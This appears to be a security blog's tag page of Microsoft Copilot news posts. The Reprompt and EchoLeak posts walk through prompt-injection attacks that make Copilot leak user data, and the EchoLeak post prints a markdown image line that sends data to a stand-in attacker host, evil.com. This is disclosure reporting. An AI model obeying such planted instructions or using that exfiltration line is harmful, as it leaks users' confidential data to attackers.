Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Microsoft Copilot. Show all posts
URL Attack
Cyber Attacks GenAI Security Microsoft Copilot Prompt Injection URL Attack

New Reprompt URL Attack Exposed and Patched in Microsoft Copilot

 

Security researchers at Varonis have uncovered a new prompt-injection technique targeting Microsoft Copilot, highlighting how a single click could be enough to compromise sensitive user data. The attack method, named Reprompt, abuses the way Copilot and similar generative AI assistants process certain URL parameters, effectively turning a normal-looking link into a vehicle for hidden instructions. While Microsoft has since patched the flaw, the finding underscores how quickly attackers are adapting AI-specific exploitation methods.

Prompt injection attacks work by slipping hidden instructions into content that an AI model is asked to read, such as emails or web pages. Because large language models still struggle to reliably distinguish between data to analyze and commands to execute, they can be tricked into following these embedded prompts. In traditional cases, this might mean white text on a white background or minuscule fonts inside an email that the user then asks the AI to summarize, unknowingly triggering the malicious instructions.

Reprompt takes this concept a step further by moving the injection into the URL itself, specifically into a query parameter labeled “q.” Varonis demonstrated that by appending a long string of detailed instructions to an otherwise legitimate Copilot link, such as “http://copilot.microsoft.com/?q=Hello”, an attacker could cause Copilot to treat that parameter as if the user had typed it directly into the chat box. In testing, this allowed the researchers to exfiltrate sensitive data that the victim had previously shared with the AI, all triggered by a single click on a crafted link.

This behaviour is especially dangerous because many LLM-based tools interpret the q parameter as natural-language input, effectively blurring the line between navigation and instruction. A user might believe they are simply opening Copilot, but in reality they are launching a session already preloaded with hidden commands created by an attacker. Once executed, these instructions could request summaries of confidential conversations, collect personal details, or send data to external endpoints, depending on how tightly the AI is integrated with corporate systems.

After Varonis disclosed the issue, Microsoft moved to close the loophole and block prompt-injection attempts delivered via URLs. According to the researchers, prompt injection through q parameters in Copilot is no longer exploitable in the same way, reducing the immediate risk for end users. Even so, Reprompt serves as a warning that AI interfaces—especially those embedded into browsers, email clients, and productivity suites—must be treated as sensitive attack surfaces, demanding continuous testing and robust safeguards against new injection techniques.
Read more »
URL
Artificial Intelligence Cyber Security Data Exfiltration Microsoft Copilot Reprompt URL

Security Researchers Warn of ‘Reprompt’ Flaw That Turns AI Assistants Into Silent Data Leaks

 



Cybersecurity researchers have revealed a newly identified attack technique that shows how artificial intelligence chatbots can be manipulated to leak sensitive information with minimal user involvement. The method, known as Reprompt, demonstrates how attackers could extract data from AI assistants such as Microsoft Copilot through a single click on a legitimate-looking link, while bypassing standard enterprise security protections.

According to researchers, the attack requires no malicious software, plugins, or continued interaction. Once a user clicks the link, the attacker can retain control of the chatbot session even if the chat window is closed, allowing information to be quietly transmitted without the user’s awareness.

The issue was disclosed responsibly, and Microsoft has since addressed the vulnerability. The company confirmed that enterprise users of Microsoft 365 Copilot are not affected.

At a technical level, Reprompt relies on a chain of design weaknesses. Attackers first embed instructions into a Copilot web link using a standard query parameter. These instructions are crafted to bypass safeguards that are designed to prevent direct data exposure by exploiting the fact that certain protections apply only to the initial request. From there, the attacker can trigger a continuous exchange between Copilot and an external server, enabling hidden and ongoing data extraction.

In a realistic scenario, a target might receive an email containing what appears to be a legitimate Copilot link. Clicking it would cause Copilot to execute instructions embedded in the URL. The attacker could then repeatedly issue follow-up commands remotely, prompting the chatbot to summarize recently accessed files, infer personal details, or reveal contextual information. Because these later instructions are delivered dynamically, it becomes difficult to determine what data is being accessed by examining the original prompt alone.

Researchers note that this effectively turns Copilot into an invisible channel for data exfiltration, without requiring user-entered prompts, extensions, or system connectors. The underlying issue reflects a broader limitation in large language models: their inability to reliably distinguish between trusted user instructions and commands embedded in untrusted data, enabling indirect prompt injection attacks.

The Reprompt disclosure coincides with the identification of multiple other techniques targeting AI-powered tools. Some attacks exploit chatbot connections to third-party applications, enabling zero-interaction data leaks or long-term persistence by injecting instructions into AI memory. Others abuse confirmation prompts, turning human oversight mechanisms into attack vectors, particularly in development environments.

Researchers have also shown how hidden instructions can be planted in shared documents, calendar invites, or emails to extract corporate data, and how AI browsers can be manipulated to bypass built-in prompt injection defenses. Beyond software, hardware-level risks have been identified, where attackers with server access may infer sensitive information by observing timing patterns in machine learning accelerators.

Additional findings include abuses of trusted AI communication protocols to drain computing resources, trigger hidden tool actions, or inject persistent behavior, as well as spreadsheet-based attacks that generate unsafe formulas capable of exporting user data. In some cases, attackers could manipulate AI development platforms to alter spending controls or leak access credentials, enabling stealthy financial abuse.

Taken together, the research underlines that prompt injection remains a persistent and evolving risk. Experts recommend layered security defenses, limiting AI privileges, and restricting access to sensitive systems. Users are also advised to avoid clicking unsolicited AI-related links and to be cautious about sharing personal or confidential information in chatbot conversations.

As AI systems gain broader access to corporate data and greater autonomy, researchers warn that the potential impact of a single vulnerability increases substantially, underscoring the need for careful deployment, continuous monitoring, and ongoing security research.


Read more »
Privacy Concerns
ai agents AI technology Copilot Data Privacy data security Microsoft Microsoft Copilot Privacy Privacy Concerns

Microsoft’s Copilot Actions in Windows 11 Sparks Privacy and Security Concerns

When it comes to computer security, every decision ultimately depends on trust. Users constantly weigh whether to download unfamiliar software, share personal details online, or trust that their emails reach the intended recipient securely. Now, with Microsoft’s latest feature in Windows 11, that question extends further — should users trust an AI assistant to access their files and perform actions across their apps? 


Microsoft’s new Copilot Actions feature introduces a significant shift in how users interact with AI on their PCs. The company describes it as an AI agent capable of completing tasks by interacting with your apps and files — using reasoning, vision, and automation to click, type, and scroll just like a human. This turns the traditional digital assistant into an active AI collaborator, capable of managing documents, organizing folders, booking tickets, or sending emails once user permission is granted.  

However, giving an AI that level of control raises serious privacy and security questions. Granting access to personal files and allowing it to act on behalf of a user requires substantial confidence in Microsoft’s safeguards. The company seems aware of the potential risks and has built multiple protective layers to address them. 

The feature is currently available only in experimental mode through the Windows Insider Program for pre-release users. It remains disabled by default until manually turned on from Settings > System > AI components > Agent tools by activating the “Experimental agentic features” option. 

To maintain strict oversight, only digitally signed agents from trusted sources can integrate with Windows. This allows Microsoft to revoke or block malicious agents if needed. Furthermore, Copilot Actions operates within a separate standard account created when the feature is enabled. By default, the AI can only access known folders such as Documents, Downloads, Desktop, and Pictures, and requires explicit user permission to reach other locations. 

These interactions occur inside a controlled Agent workspace, isolated from the user’s desktop, much like Windows Sandbox. According to Dana Huang, Corporate Vice President of Windows Security, each AI agent begins with limited permissions, gains access only to explicitly approved resources, and cannot modify the system without user consent. 

Adding to this, Microsoft’s Peter Waxman confirmed in an interview that the company’s security team is actively “red-teaming” the feature — conducting simulated attacks to identify vulnerabilities. While he did not disclose test details, Microsoft noted that more granular privacy and security controls will roll out during the experimental phase before the feature’s public release. 

Even with these assurances, skepticism remains. The security research community — known for its vigilance and caution — will undoubtedly test whether Microsoft’s new agentic AI model can truly deliver on its promise of safety and transparency. As the preview continues, users and experts alike will be watching closely to see whether Copilot Actions earns their trust.
Read more »
Zero-Click Flaw
AIM Cyber Patch CyberCrime CyberThreat Microsoft Copilot Vulnerabilities and Exploits Zero-Click Flaw

Aim Security Reveals Zero-Click Flaw in AI Powered Microsoft Copilot

 


It has recently been reported that a breakthrough cyber threat known as EchoLeak has been documented as the first documented zero-click vulnerability that specifically targets Microsoft 365 Copilot in the enterprise. This raises important concerns regarding the evolving risks associated with AI-based enterprise tools.

In a recent report, cybersecurity firm AIM Security has discovered a vulnerability that allows threat actors to stealthily exfiltrate sensitive information from Microsoft's intelligent assistant without any user interaction, marking a significant improvement in the sophistication of attacks that are based on artificial intelligence. 

This vulnerability, known as CVE-2025-32711, which carries a critical CVSS score of 9.3, represents an extremely serious form of injection of commands into the artificial intelligence system. Copilot's responses can be manipulated by an unauthorised actor, and data disclosure over a network can be forced by indirect prompt injection even when the user has not engaged or clicked on any of the prompts. 

As part of the June 2025 Patch Tuesday update, Microsoft confirmed that this issue exists and included the fix in the patch. In the update, Microsoft addressed 68 vulnerabilities in total. An EchoLeak is a behaviour described as a "scope Violation" in large language models (LLMs). This is the result of the AI’s response logic being bypassed by contextual boundaries that were meant to limit the AI’s behaviour. As a result, unintended behaviours could be displayed and confidential information could be leaked. 

In spite of the fact that no active exploitation of the flaw has been detected, Microsoft has stated that there is no need for the customer to take any action at this time, since this issue has already been resolved. In light of this incident, it becomes increasingly apparent that the threat of securing AI-powered productivity tools is growing and that organisations must put in more robust measures to protect data from theft and exploitation. 

It is believed that the EchoLeak vulnerability exploits a critical design flaw in Microsoft 365 Copilot's interaction with trusted internal data sources, including emails, Teams conversations, and OneDrive files, as well as untrustworthy external inputs, especially inbound emails, that can be exploited in a malicious manner. 

As a result of the attack, the threat actor sends an email that contains the following markdown syntax:

![Image alt text][ref] [ref]: https://www.evil.com?param= 

The code seems harmless, but it exploits Copilot's background scanning behaviour in a way that appears harmless. When Copilot processes an email without any user action, it is inadvertently executing a browser request to transmit information to an external server controlled by an attacker, including user details, chat history, and confidential internal documents. 

Considering this kind of exfiltration requires no user input, it's particularly stealthy and dangerous. It relies on a triple underlying vulnerability chain to carry out the exploit chain, one of the most critical of which is a redirect loophole within Microsoft's Content Security Policy (CSP). As a result of the CSP's inherent trust in domains such as Microsoft Teams and SharePoint, attackers have been able to disguise malicious payloads as legitimate traffic, enabling them to evade detection. 

By presenting the exploit in a clever disguise, it is possible to bypass the existing defences that have been built to protect against Cross-Prompt Injection Attacks (XPIA)—a type of attack that hijacks AI prompts across contexts—to bypass existing defences. EchoLeak is considered to be an example of an LLM Scope Violation, a situation in which large language models (LLMs) are tricked into accessing and exposing information that goes outside of their authorised scope, which constitutes an LLM Scope Violation. 

It is reported that the researchers at the company are able to use various segments of the AI's context window as references to gather information that the AI should not reveal. In this case, Copilot can synthesize responses from a variety of sources, but becomes a vector for data exfiltration because the very feature that enables Copilot to do so becomes a vector for data exfiltration. 

According to Michael Garg, Co-Founder and CTO of Aim Security, a phased deployment of artificial intelligence does not guarantee safety. In his opinion, EchoLeak highlights a serious concern with the assumptions surrounding artificial intelligence security, particularly in systems that combine trusted and untrusted sources without establishing strict boundaries. 

Interestingly, researchers have also found similar vulnerabilities in other LLM-based systems, suggesting that the issue may go beyond Microsoft 365 Copilot as well. It is now understood that the flaw has been fixed by Microsoft and that no malicious exploitation has been reported in the wild, and no customer information has been compromised as a result. 

However, the discovery of EchoLeak serves to remind us of the unique risks that AI-powered platforms pose and that proactive security validation in AI deployments is an imperative step. In EchoLeak, a complex yet very simple exploit is exploited, which exploits the seamless integration between large language models (LLMs) and enterprise productivity tools by leveraging the deception-like simplicity of the attack chain and utilising it to its fullest extent. In the beginning, the attack begins with a malicious email designed to appear as a routine business communication.

It does not contain any obvious indicators that would raise suspicions. This message is disguised as a benign one, but it has been crafted into a stealthy prompt injection, a clever piece of text that is intended to manipulate the AI without being detected. The reason this injection is so dangerous is the natural language phrasing it uses, which enables it to bypass Microsoft's Cross-Prompt Injection Attack (XPIA) classifier protections in order to evade detection. 

The message is constructed in such a way that it appears contextually relevant to the end user, so existing filters do not flag the message. Then, whenever a user interacts with Copilot and poses a related business query, the Retrieval-Augmented Generation (RAG) engine from Microsoft retrieves that previously received email and interprets it as relevant to the user's request within the LLM's context input. 

The malicious injection, once it is included in the prompt context, disappears from sight and undercoverly instructs the LLM to extract internal data, such as confidential memos or user-specific identifiers, and embed these sensitive details as a URL or image reference on the site. As a result of exploiting certain markdown image formats during testing, the browser was prompted to fetch the image without prompting the user, which then sent the entire URL, including the embedded sensitive data, to the attacker’s server, without the user being aware of the situation. 

Among the key components that enable the exploit is Microsoft Copilot’s Content Security Policy (CSP), which, despite being designed to block external domains, trusts Microsoft-owned platforms such as Teams and SharePoint despite blocking most external domains. By cleverly concealing their exfiltration vectors, attackers have the ability to avoid CSP protections by making outbound requests appear legitimate, bypassing CSPs and ensuring the outbound request appears legitimate. 

While Microsoft has since patched the vulnerability, the EchoLeak incident points to a broader and more alarming trend: as LLMs become increasingly integrated into business environments, traditional security frameworks are becoming increasingly unable to detect and defend against contextual and zero-click artificial intelligence attacks. It has been found that the increasing complexity and autonomy of artificial intelligence systems have already created a whole new class of vulnerabilities which could be concealed and weaponised to obtain high-impact intrusions through stealth. 

It has become increasingly common for security experts to emphasise the need for enhanced prompt injection defences against such emerging threats, including enhanced input scoping, the use of postprocessing filters to block AI-generated outputs containing structured data or external links, as well as smarter configurations in RAG engines that prevent the retrieval of untrusted data. It is essential to implement these mitigations in AI-powered workflows in order to prevent future incidents of data leakage via LLMs, as well as build resilience within these workflows. 

Research from AIM Security has shown that the EchoLeak exploit is very severe and exploits Microsoft's trusted domains, such as SharePoint and Teams, that have been approved by Copilot's Content Security Policy (CSP) for security purposes. It is possible to embed images and hyperlinks into Microsoft 365 Copilot seamlessly by using these whitelisted domains, which allow external content, such as images, to be seamlessly rendered within the application. 

When Copilot processes such content, even in the background, it can initiate outbound HTTP requests, sending sensitive contextual data to servers owned by attackers without being aware of it. The insidious nature of this attack is that it involves no interaction from the user at all, and it is extremely difficult to detect. Essentially, the entire exploit chain is executed in silence in the background, triggered by Copilot's automated scanning and processing of incoming email content, which can include maliciously formatted documents. 

To use this exploit, the user doesn't need to open the message or click on any links. Instead, the AI assistant automatically launches the data exfiltration process with its internal mechanisms, earning the exploit the classification of a "zero-click" attack. This exploit has been validated by Aim Security through the development and publication of a proof-of-concept, which demonstrates how deeply embedded and confidential information, such as internal communications and corporate strategy documents, could be exploited without causing any visible signs or warnings to the end user or to system administrators, without anyone being aware of it at all. 

There is a significant challenge in detecting threats and investigating forensic events due to the stealthy nature of the vulnerability. Microsoft has addressed he vulnerability and has taken swift measures to address it, reminding users that no active exploitation has been observed so far, and no customer data has been compromised as of yet. 

Although the broader implications of the current situation remain unsettling, the very architecture that enables AI systems such as Copilot to synthesise data, engage with users, and provide assistance will also become a potential attack surface - one that is both silent and highly effective in its capabilities. Despite the fact that this particular instance may not have been exploited in the wild, cybersecurity professionals warn that the method itself signals a paradigm shift in the vulnerability landscape when it comes to AI-related services. 

With the increasing use of artificial intelligence services such as Microsoft 365 Copilot, the threat landscape has expanded considerably, but it also highlights the importance of context-aware security models as well as AI-specific threat monitoring frameworks in light of the increasing integration of large language models into enterprise workflows.
Read more »
Windows
Advanced Technology Microsoft Microsoft Copilot Security Feature Windows

Windows 11’s Recall feature is Now Ready For Release, Microsoft Claims

 

Microsoft has released an update regarding the Recall feature in Windows 11, which has been on hold for some time owing to security and privacy concerns. The document also details when Microsoft intends to move forward with the feature and roll it out to Copilot+ PCs. 

Microsoft said in a statement that the intention is to launch Recall on CoPilot+ laptops in November, with a number of protections in place to ensure that the feature is safe enough, as explained in a separate blog post. So, what are these measures supposed to appease the critics of Recall - a supercharged AI-powered search in Windows 11 that uses regular screenshots ('snapshots' as Microsoft calls them) of the activity on your PC - as it was originally intended? 

One of the most significant changes is that, as Microsoft had previously informed us, Recall will only be available with permission, rather than being enabled by default as it was when the function was first introduced. 

“During the set-up experience for Copilot+ PCs, users are given a clear option whether to opt-in to saving snapshots using Recall. If a user doesn’t proactively choose to turn it on, it will be off, and snapshots will not be taken or saved,” Microsoft noted. 

Additionally, as Microsoft has stated, snapshots and other Recall-related data would be fully permitted, and Windows Hello login will be required to access the service. In other words, you'll need to check in through Hello to prove that you're the one using Recall (not someone else on your PC). 

Furthermore, Recall will use a secure environment known as a Virtualization-based Security Enclave, or VBS Enclave, which is a fully secure virtual computer isolated from the Windows 11 system that can only be accessed by the user via a decryption key (given with the Windows Hello sign-in).

David Weston, who wrote Microsoft’s blog post and is VP of Enterprise and OS Security, explained to Windows Central: “All of the sensitive Recall processes, so screenshots, screenshot processing, vector database, are now in a VBS Enclave. We basically took Recall and put it in a virtual machine [VM], so even administrative users are not able to interact in that VM or run any code or see any data.”

Similarly, Microsoft cannot access your Recall data. And, as the software giant has already stated, all of this data is stored locally on your machine; none of it is sent to the cloud. This is why Recall is only available on Copilot+ PCs - it requires a strong NPU for acceleration and local processing to function properly. 

Finally, Microsoft addresses a previous issue about Recall storing images of, say, your online banking site and perhaps sensitive financial information - the tool now filters out things like passwords and credit card numbers.
Read more »
Windows Hello
AI technology Copilot Cyber Security data security Edge Browser Microsoft Microsoft Copilot Privacy Concerns Windows 11 Recall Windows Hello

Microsoft Revises AI Feature After Privacy Concerns

 

Microsoft is making changes to a controversial feature announced for its new range of AI-powered PCs after it was flagged as a potential "privacy nightmare." The "Recall" feature for Copilot+ was initially introduced as a way to enhance user experience by capturing and storing screenshots of desktop activity. However, following concerns that hackers could misuse this tool and its saved screenshots, Microsoft has decided to make the feature opt-in. 

"We have heard a clear signal that we can make it easier for people to choose to enable Recall on their Copilot+ PC and improve privacy and security safeguards," said Pavan Davuluri, corporate vice president of Windows and Devices, in a blog post on Friday. The company is banking on artificial intelligence (AI) to drive demand for its devices. Executive vice president Yusuf Medhi, during the event's keynote speech, likened the feature to having photographic memory, saying it used AI "to make it possible to access virtually anything you have ever seen on your PC." 

The feature can search through a user's past activity, including files, photos, emails, and browsing history. While many devices offer similar functionalities, Recall's unique aspect was its ability to take screenshots every few seconds and search these too. Microsoft claimed it "built privacy into Recall’s design" from the beginning, allowing users control over what was captured—such as opting out of capturing certain websites or not capturing private browsing on Microsoft’s browser, Edge. Despite these assurances, the company has now adjusted the feature to address privacy concerns. 

Changes will include making Recall an opt-in feature during the PC setup process, meaning it will be turned off by default. Users will also need to use Windows' "Hello" authentication process to enable the tool, ensuring that only authorized individuals can view or search their timeline of saved activity. Additionally, "proof of presence" will be required to access or search through the saved activity in Recall. These updates are set to be implemented before the launch of Copilot+ PCs on June 18. The adjustments aim to provide users with a clearer choice and enhanced control over their data, addressing the potential privacy risks associated with the feature. 

Microsoft's decision to revise the Recall feature underscores the importance of user feedback and the company's commitment to privacy and security. By making Recall opt-in and incorporating robust authentication measures, Microsoft seeks to balance innovation with the protection of user data, ensuring that AI enhancements do not compromise privacy. As AI continues to evolve, these safeguards are crucial in maintaining user trust and mitigating the risks associated with advanced data collection technologies.
Read more »
Vulnerabilities and Exploits
AI image generation Copilot image generation models Microsoft Microsoft Copilot Vulnerabilities and Exploits

Microsoft Employee Raises Alarms Over Copilot Designer and Urges Government Intervention

 

Shane Jones, a principal software engineering manager at Microsoft, has sounded the alarm about the safety of Copilot Designer, a generative AI tool introduced by the company in March 2023. 

His concerns have prompted him to submit a letter to both the US Federal Trade Commission (FTC) and Microsoft's board of directors, calling for an investigation into the text-to-image generator. Jones's apprehension revolves around Copilot Designer's unsettling capacity to generate potentially inappropriate images, spanning themes such as explicit content, violence, underage drinking, and drug use, as well as instances of political bias and conspiracy theories. 

Beyond highlighting these concerns, he has emphasized the critical need to educate the public, especially parents and educators, about the associated risks, particularly in educational settings where the tool may be utilized. Despite Jones's persistent efforts over the past three months to address the issue internally at Microsoft, the company has not taken action to remove Copilot Designer from public use or implement adequate safeguards. His recommendations, including the addition of disclosures and adjustments to the product's rating on the Android app store, were not implemented by the tech giant. 

Microsoft responded to the concerns raised by Jones, assuring its commitment to addressing employee concerns within the framework of company policies. The company expressed appreciation for efforts aimed at enhancing the safety of its technology. However, the situation underscores the internal challenges companies may face in balancing innovation with the responsibility of ensuring their technologies are safe and ethical. 

This incident isn't the first time Jones has spoken out about AI safety concerns. Despite facing pressure from Microsoft's legal team, Jones persisted in voicing his concerns, even extending his efforts to communicate with US senators about the broader risks associated with AI safety. The case of Copilot Designer adds to the ongoing scrutiny of AI technologies in the tech industry. Google recently paused access to its image generation feature on Gemini, its competitor to OpenAI's ChatGPT, after facing complaints about historically inaccurate images involving race. 

DeepMind, Google's AI division, reassured users that the feature would be reinstated after addressing the concerns and ensuring responsible use of the technology. As AI technologies become increasingly integrated into various aspects of our lives, incidents like the one involving Copilot Designer highlight the imperative for vigilant oversight and ethical considerations in AI development and deployment. The intersection of innovation and responsible AI use remains a complex landscape that necessitates collaboration between tech companies, regulatory bodies, and stakeholders to ensure the ethical and safe evolution of AI technologies.
Read more »
Technology
AI technology Financial Data Microsoft Microsoft Copilot Technology

Microsoft Copilot for Finance: Transforming Financial Workflows with AI Precision

 

In a groundbreaking move, Microsoft has unveiled the public preview for Microsoft Copilot for Finance, a specialized AI assistant catering to the unique needs of finance professionals. This revolutionary AI-powered tool not only automates tedious data tasks but also assists finance teams in navigating the ever-expanding pool of financial data efficiently. 

Microsoft’s Corporate Vice President of Business Applications Marketing, highlighted the significance of Copilot for Finance, emphasizing that despite the popularity of Enterprise Resource Planning (ERP) systems, Excel remains the go-to platform for many finance professionals. Copilot for Finance is strategically designed to leverage the Excel calculation engine and ERP data, streamlining tasks and enhancing efficiency for finance teams. 

Building upon the foundation laid by Microsoft's Copilot technology released last year, Copilot for Finance takes a leap forward by integrating seamlessly with Microsoft 365 apps like Excel and Outlook. This powerful AI assistant focuses on three critical finance scenarios: audits, collections, and variance analysis. Charles Lamanna, Microsoft’s Corporate Vice President of Business Applications & Platforms, explained that Copilot for Finance represents a paradigm shift in the development of AI assistants. 

Unlike its predecessor, Copilot for Finance is finely tuned to understand the nuances of finance roles, offering targeted recommendations within the Excel environment. The specialization of Copilot for Finance sets it apart from the general Copilot assistant, as it caters specifically to the needs of finance professionals. This focused approach allows the AI assistant to pull data from financial systems, analyze variances, automate collections workflows, and assist with audits—all without requiring users to leave the Excel application. 

Microsoft's strategic move towards role-based AI reflects a broader initiative to gain a competitive edge over rivals. Copilot for Finance has the potential to accelerate impact and reduce financial operation costs for finance professionals across organizations of all sizes. By enabling interoperability between Microsoft 365 and existing data sources, Microsoft aims to provide customers with seamless access to business data in their everyday applications. 

Despite promising significant efficiency gains, the introduction of AI-driven systems like Copilot for Finance raises valid concerns around data privacy, security, and compliance. Microsoft assures users that they have implemented measures to address these concerns, such as leveraging data access permissions and avoiding direct training of models on customer data. 

As Copilot for Finance moves into general availability later this year, Microsoft faces the challenge of maintaining data governance measures while expanding the AI assistant's capabilities. The summer launch target for general availability, as suggested by members of the Copilot for Finance launch team, underscores the urgency and anticipation surrounding this transformative AI tool. 

With over 100,000 organizations already benefiting from Copilot, the rapid adoption of Copilot for Finance could usher in a new era of AI in the enterprise. Microsoft's commitment to refining data governance and addressing user feedback will be pivotal in ensuring the success and competitiveness of Copilot for Finance in the dynamic landscape of AI-powered financial assistance.
Read more »
Technology
AI Assistant AI technology Microsoft Microsoft Copilot Technology

Microsoft Copilot: A Visual Revolution in AI Image Editing

 

In a significant and forward-thinking development, Microsoft has recently upgraded its AI-powered coding assistant, Copilot, introducing a groundbreaking feature that extends its capabilities into the realm of AI image editing. This not only marks a substantial expansion of Copilot's functionalities but also brings about a visual overhaul to its interface, signifying a noteworthy stride in the convergence of artificial intelligence and creative processes. 

Microsoft Copilot initially gained prominence for its role in assisting developers with code suggestions. However, it has now transcended its traditional coding domain, venturing into the arena of image editing. Leveraging advanced machine learning algorithms, Copilot can intelligently understand and interpret user inputs, providing real-time suggestions for image editing. This fusion of coding assistance and visual creativity not only showcases the versatility of AI technologies but also points towards an era where these technologies seamlessly integrate into various aspects of digital workflows. 

Accompanying the introduction of AI image editing, Microsoft Copilot's user interface has undergone a substantial visual overhaul. The interface seamlessly integrates both coding and image editing functionalities, offering users a unified and intuitive experience. This revamped design is intended to streamline workflows, allowing users to transition seamlessly between coding tasks and creative endeavours without encountering friction in their digital workspaces. 

The integration of AI image editing within Microsoft Copilot holds the potential to revolutionize the collaborative efforts of developers and designers. With a single tool now offering both coding assistance and visual creativity, there is an opportunity for increased synergy between these traditionally distinct roles. This streamlined workflow could result in more efficient project development, ultimately reducing the gap between the ideation and execution phases of digital projects. 

Furthermore, Microsoft Copilot's foray into image editing emphasizes the growing influence of AI in creative processes. By harnessing machine learning capabilities, Copilot can analyze image contexts and user preferences, providing relevant and context-aware suggestions. This not only accelerates the image editing process but also introduces an element of creativity and inspiration driven by AI algorithms. 

In the ever-evolving landscape of technology, the upgrade to Microsoft Copilot with AI image editing capabilities signifies a significant step forward. As the boundaries between coding and creative tasks blur, this development showcases the transformative potential of artificial intelligence in shaping the future of digital workspaces. Microsoft Copilot stands as a testament to Microsoft's commitment to innovation, highlighting the seamless integration of technology into diverse aspects of digital work.
Read more »
Technology
AI technology Artificial Inteligence Microsoft 365 Microsoft Copilot Technology

Microsoft is Rolling out an AI Powered Key

 


Prepare for a paradigm shift as Microsoft takes a giant leap forward with a game-changing announcement – the integration of an Artificial Intelligence (AI) key in their keyboards, the most substantial update in 30 years. 

This futuristic addition promises an interactive and seamless user experience, bringing cutting-edge technology to the tips of your fingers. Explore the next frontier of computing as Microsoft redefines the way we engage with our keyboards, setting a new standard for innovation in the digital age. The groundbreaking addition grants users seamless access to Copilot, Microsoft's dynamic AI tool designed to elevate your computing experience. 

At the forefront of AI advancements, Microsoft, a key investor in OpenAI, strategically integrates Copilot's capabilities into various products. Witness the evolution of AI as Microsoft weaves its intelligence into the fabric of everyday tools like Microsoft 365 and enhances search experiences through Bing. 

Not to be outdone, rival Apple has long embraced AI integration, evident in Macbooks featuring a dedicated Siri button on their touch bar. As the tech giants vie for user-friendly AI interfaces, Microsoft's AI key emerges as a pivotal player in redefining how we interact with technology. 

Copilot, the star of Microsoft's AI arsenal, goes beyond the ordinary, assisting users in tasks ranging from efficient searches to crafting emails and even generating visually striking images. It's not just a tool; it's your personalised AI companion, simplifying tasks and enriching your digital journey. Welcome to the era where every keystroke opens doors to boundless possibilities. 

By pressing this key, users seamlessly engage with Copilot, enhancing their daily experiences with artificial intelligence. Similar to the impact of the Windows key introduced nearly 30 years ago, the Copilot key marks another significant milestone in our journey with Windows, serving as the gateway to the realm of AI on PCs. 

In the days leading up to and during CES, the Copilot key will debut on numerous Windows 11 PCs from our ecosystem partners. Expect its availability from later this month through Spring, including integration into upcoming Surface devices. 

This addition, which simplifies access to Copilot, has already made waves in Office 365 applications like Word, PowerPoint, and Teams, offering functionalities such as meeting summarization, email writing, and presentation creation. Bing, Microsoft's search engine, has also integrated Copilot. 

According to Prof John Tucker from Swansea University, the introduction of this key is a natural progression, showcasing Microsoft's commitment to enhancing user experience across various products. Despite Windows 11 users already having access to Copilot via the Windows key + C shortcut, the new dedicated key emphasises the feature's value.

Acknowledging the slow evolution of keyboards over the past 30 years, Prof Tucker notes that Microsoft's focus on this particular feature illustrates its potential to engage users across multiple products. Google, a dominant search engine, employs its own AI system called Bard, while Microsoft's Copilot is built on OpenAI's GPT-4 language model, introduced in 2022. 

The UK's competition watchdog is delving into Microsoft's ties with OpenAI, prompted by disruptions in the corporate landscape that resulted in a tight connection between the two entities. The investigation seeks to understand the implications of this close association on competition within the industry. 

As we anticipate its showcase at CES, this innovative addition not only reflects Microsoft's commitment to user-friendly technology but also sparks curiosity about the evolving landscape of AI integration. Keep your eyes on the keyboard – the Copilot key signals a transformative era where AI becomes an everyday companion in our digital journey.


Read more »
Technology
AI Chatbots Bing Chat Chatbot ChatGPT Copilot Microsoft Microsoft Copilot Technology

Bing Chat Rebrands to ‘Copilot’: What is New?


Bing Chat has been renamed as ‘Copilot,’ according to an announcement made during Microsoft Ignite 2023.

But, is the name change the only new thing the users will be introduced with? The answer could be a little ambiguous. 

What is New with Bing Chat (now Copilot)? Honestly, there are no significant changes in Copilot, previously called Bing Chat. “Refinement” might be a more appropriate term to characterize Microsoft's perplexing activities. Let's examine three modifications that Microsoft made to its AI chatbot.

Here, we are listing some of these refinements:

1. A New Home

Copilot, then Bing Chat, now has its own standalone webpage. One can access this webpage at https://copilot.microsoft.com

This means that the user will no longer be required to visit Bing in order to access Microsoft’s AI chat experience. One can simply visit the aforementioned webpage, without Bing Search and other services interfering with your experience. Put differently, it has become much more "ChatGPT-like" now. 

Notably, however, the link seems to only function with desktop versions of Microsoft Edge and Google Chrome. 

2. A Minor Makeover

While Microsoft has made certain visual changes in the rebranded Bing Chat, they are however insignificant. 

This new version has smaller tiles but still has the same prompts: Write, Create, Laugh, Code, Organize, Compare, and Travel.

However, the users can still choose the conversation style, be it Creative, Balanced and Precise. The only big change, as mentioned before, is the new name (Copilot) and the tagline: "Your everyday AI companion." 

Though the theme colour switched from light blue to an off-white, the user interface is largely the same.

Users can access DALLE-3 and GPT-4 for free with Bing Chat, which is now called Copilot. But in order to utilize Copilot on platforms like Word, Excel, PowerPoint, and other widely used productivity tools, users will have to pay a membership fee for what Microsoft refers to as "Copilot for Microsoft 365."

3. Better Security for Enterprise Users

With Copilot, users can access DALLE-3 and GPT-4 for free. But in order to utilize Copilot on platforms like Word, Excel, PowerPoint, and other widely used productivity tools, users will have to pay a membership fee for what Microsoft refers to as "Copilot for Microsoft 365."

This way, users who have had a Bing Chat Enterprise account, or pay for a Microsoft 365 license, will get an additional benefit of more data protection./ Copilot will be officially launched on December 1. 

What Stayed the Same? 

Microsoft plans to gradually add commercial data protection for those who do not pay. However, Copilot currently stores information from your interactions and follows the same data policy as the previous version of Bing Chat for free users. Therefore, the name and domain change is the only difference for casual, non-subscribing Bing Chat users. OpenAI's GPT-4 and DALL-E 3 models are still available, but users need to be careful about sharing too much personal data with the chatbot.

In summary, there is not much to be excited about for free users: Copilot is the new name for Bing Chat, and it has a new home.  

Read more »
Technology
AI Assistant AI Chatbot AI-powered tool Copilot Microsoft Microsoft 365 Microsoft Copilot Technology

Microsoft Copilot: New AI Chatbot can Attend Meetings for Users


A ChatGPT-style AI chatbot, developed by Microsoft will now help online users summarize their Teams meetings by drafting emails, and creating Word documents, spreadsheet graphs, and PowerPoint presentations in very little time. 

Microsoft introduced Copilot – its workplace assistant – earlier this year, labelling the product as a “copilot for work.”

Copilot which will be made available for the users from November 1, will be integrated to the subscribers of Microsoft 365 apps such as Word, Excel, Teams and PowerPoint – with a subscription worth $30 per user/month.

Additionally, as part of the new service, employees at companies who use Microsoft's Copilot could theoretically send their AI helpers to meetings in their place, allowing them to miss or double-book appointments and focus on other tasks.

‘Busywork That Bogs Us Down’

